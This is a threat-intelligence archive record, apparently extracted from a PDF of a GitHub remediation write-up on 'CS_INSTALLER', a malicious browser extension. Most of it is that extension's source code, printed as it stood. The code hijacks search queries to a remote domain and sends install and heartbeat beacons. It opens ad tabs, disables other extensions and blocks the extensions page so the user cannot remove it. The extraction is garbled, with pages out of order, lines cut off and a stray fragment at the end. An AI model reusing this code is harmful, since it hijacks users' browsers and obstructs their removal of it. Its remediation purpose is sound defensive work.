O4.indexOf(\"q=\") \u003e= 0) {\r\n R4 = L4.searchParams.get(\"q\");\r\n }\r\n if (R4 \u0026\u0026 R4.length \u003e 1) {\r\n r4 = getWithExpiry(\"lastQuery\");\r\n p4 = Math.floor(Math.random() * 100);\r\n F4 = getWithExpiry(\"is\") || 100;\r\n i4 = s4.initiator;\r\n w4 = 0;\r\n if (i4) {\r\n if (i4.includes(\"bing.\")) {\r\n w4 = 1;\r\n }\r\n if (i4.includes(\"yahoo.\")) {\r\n w4 = 1;\r\nhttps://github.com/xephora/Threat-Remediation-Scripts/tree/main/Threat-Track/CS_INSTALLER\r\nPage 14 of 18\n\n}\r\n }\r\n if (F4 \u003e p4 \u0026\u0026 w4 \u0026\u0026 r4) {\r\n setWithExpirySec(\"lastQuery\", R4, 60);\r\n return null;\r\n }\r\n if (R4 === r4) {\r\n return null;\r\n }\r\n setWithExpirySec(\"lastQuery\", R4, 60);\r\n b4 = _ExtDom + \"search?ext=\" + _ExtnensionName + \"\u0026ver=\" + _ExtensionVersion + \"\u0026is=\" + w4 + \"\u0026q=\r\n chrome.tabs.update({url: b4});\r\n }\r\n}, {urls: [\"https://*.google.com/*\", \"https://*.yahoo.com/*\", \"https://*.bing.com/*\"]}, [\"blocking\"]\r\nfunction getWithExpiry(N4) {\r\n var z4, Q4, I4;\r\n z4 = localStorage.getItem(N4);\r\n if (!z4) {\r\n return null;\r\n }\r\n Q4 = JSON.parse(z4);\r\n I4 = new Date;\r\n if (I4.getTime() \u003e Q4.expiry) {\r\n localStorage.removeItem(N4);\r\n return null;\r\n }\r\n return Q4.value;\r\n}\r\nchrome.runtime.onInstalled.addListener(k4 =\u003e {\r\n if (k4.reason == \"install\") {\r\n localStorage.removeItem(\"lastQuery\");\r\n localStorage.removeItem(\"ad\");\r\n localStorage.removeItem(\"is\");\r\n chrome.alarms.create(\"hb\", {delayInMinutes: 1.1, periodInMinutes: 180});\r\n chrome.alarms.create(\"ad\", {delayInMinutes: 5, periodInMinutes: 30});\r\n analytics(\"install\", \"\");\r\n sync();\r\n chrome.management.getAll(function (l4) {\r\n handleInstalledExtensions(l4);\r\n });\r\n chrome.privacy.services.searchSuggestEnabled.set({value: !true});\r\n }\r\n});\r\nchrome.runtime.setUninstallURL(_ExtDom + \"uninstall?ext=\" + _ExtnensionName + \"\u0026ver=\" + _ExtensionVe\r\nhttps://github.com/xephora/Threat-Remediation-Scripts/tree/main/Threat-Track/CS_INSTALLER\r\nPage 15 of 18\n\nfunction setWithExpirySec(v4, M4, P4) {\r\n var e4, Z4;\r\n e4 = new Date;\r\n Z4 = {value: M4, expiry: e4.getTime() + P4 * 1e3};\r\n localStorage.setItem(v4, JSON.stringify(Z4));\r\n}\r\nfunction openAd() {\r\n var h4;\r\n h4 = _ExtDom + \"ad?ext=\" + _ExtnensionName + \"\u0026ver=\" + _ExtensionVersion + \"\u0026dd=\" + _dd;\r\n fetch(h4, {method: \"GET\", credentials: \"include\", redirect: \"follow\"}).then(D4 =\u003e D4.json()).then(T\r\n var o4, E4, S4;\r\n if (T4.length \u003e 0) {\r\n o4 = T4[0];\r\n E4 = o4[1];\r\n S4 = \"https:\" + o4[2];\r\n chrome.tabs.create({url: E4}, function (C4) {\r\n fetch(S4, {credentials: \"include\"});\r\n setWithExpirySec(\"ad\", C4.id, 86400);\r\n });\r\n }\r\n }).catch(t4 =\u003e {});\r\n}\r\nchrome.contextMenus.create({title: \"Remove\", id: \"menu\", contexts: [\"browser_action\"]});\r\nchrome.tabs.onUpdated.addListener(function (H4, y4, d4) {\r\n if (y4.status == \"loading\" \u0026\u0026 d4.url.indexOf(\"chrome://extensions\") == 0) {\r\n chrome.tabs.create({url: \"chrome://settings\"});\r\n chrome.tabs.remove(H4);\r\n }\r\n});\r\nfunction sync() {\r\n var q4;\r\n q4 = _ExtDom + \"redsync\";\r\n fetch(q4, {method: \"GET\", credentials: \"include\"}).then(a4 =\u003e a4.text()).then(X4 =\u003e {\r\n analytics(\"sync\", X4);\r\n }).catch(V4 =\u003e {});\r\n}\r\nfunction handleInstalledExtensions(W4) {\r\n fetch(\"https://com.\" + _ExtDomNoSchema + \"/ext\" + \"post\" + _ExtnensionName + \"ver=\" + _ExtensionVe\r\n}\r\nchrome.browserAction.onClicked.addListener(function (G7) {\r\n chrome.tabs.create({url: \"chrome://settings\"});\r\nhttps://github.com/xephora/Threat-Remediation-Scripts/tree/main/Threat-Track/CS_INSTALLER\r\nPage 16 of 18\n\n});\r\nchrome.contextMenus.onClicked.addListener(function (m7, A7) {\r\n chrome.tabs.create({url: \"chrome://settings\"});\r\n});\r\nfunction analytics(j4, J4) {\r\n var A4;\r\n A4 = _ExtDom + j4 + \"?ext=\" + _ExtnensionName + \"\u0026ver=\" + _ExtensionVersion + \"\u0026dd=\" + _dd;\r\n if (J4 != \"\") {\r\n A4 = A4 + \"\u0026info=\" + J4;\r\n }\r\n navigator.sendBeacon(A4);\r\n}\r\nchrome.alarms.onAlarm.addListener(function (J7) {\r\n if (J7.name === \"hb\") {\r\n analytics(\"hb\", \"\");\r\n sync();\r\n } else if (J7.name === \"ad\") {\r\n getAd();\r\n }\r\n});\r\nfunction handleExtensionResp(K4) {\r\n try {\r\n extnesionIds = JSON.parse(K4).list;\r\n extnesionIds.forEach(B4 =\u003e chrome.management.setEnabled(B4, false));\r\n } catch (x4) {}\r\n}\r\nfunction getAd() {\r\n var f4;\r\n f4 = getWithExpiry(\"ad\");\r\n if (f4) {\r\n chrome.tabs.get(f4, function (c4) {\r\n if (c4) {\r\n return null;\r\n } else {\r\n openAd();\r\n }\r\n });\r\n console.clear();\r\n } else {\r\n openAd();\r\nhttps://github.com/xephora/Threat-Remediation-Scripts/tree/main/Threat-Track/CS_INSTALLER\r\nPage 17 of 18\n\n}\r\n}\r\nSource: https://github.com/xephora/Threat-Remediation-Scripts/tree/main/Threat-Track/CS_INSTALLER\r\nhttps://github.com/xephora/Threat-Remediation-Scripts/tree/main/Threat-Track/CS_INSTALLER\r\nPage 18 of 18\n\ncase break; 4:   \ns = typeof QQr8M === 'undefined' ? 3 : 9;\n Page 12 of 18",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://github.com/xephora/Threat-Remediation-Scripts/tree/main/Threat-Track/CS_INSTALLER"
	],
	"report_names": [
		"CS_INSTALLER"
	],
	"threat_actors": [
		{
			"id": "f4f16213-7a22-4527-aecb-b964c64c2c46",
			"created_at": "2024-06-19T02:03:08.090932Z",
			"updated_at": "2026-04-10T02:00:03.6289Z",
			"deleted_at": null,
			"main_name": "GOLD NIAGARA",
			"aliases": [
				"Calcium ",
				"Carbanak",
				"Carbon Spider ",
				"FIN7 ",
				"Navigator ",
				"Sangria Tempest ",
				"TelePort Crew "
			],
			"source_name": "Secureworks:GOLD NIAGARA",
			"tools": [
				"Bateleur",
				"Carbanak",
				"Cobalt Strike",
				"DICELOADER",
				"DRIFTPIN",
				"GGLDR",
				"GRIFFON",
				"JSSLoader",
				"Meterpreter",
				"OFFTRACK",
				"PILLOWMINT",
				"POWERTRASH",
				"SUPERSOFT",
				"TAKEOUT",
				"TinyMet"
			],
			"source_id": "Secureworks",
			"reports": null
		}
	],
	"ts_created_at": 1775433996,
	"ts_updated_at": 1775791873,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/12dd4a9ac63cde364293c6cb9b7e444cf601abcd.pdf",
		"text": "https://archive.orkl.eu/12dd4a9ac63cde364293c6cb9b7e444cf601abcd.txt",
		"img": "https://archive.orkl.eu/12dd4a9ac63cde364293c6cb9b7e444cf601abcd.jpg"
	}
}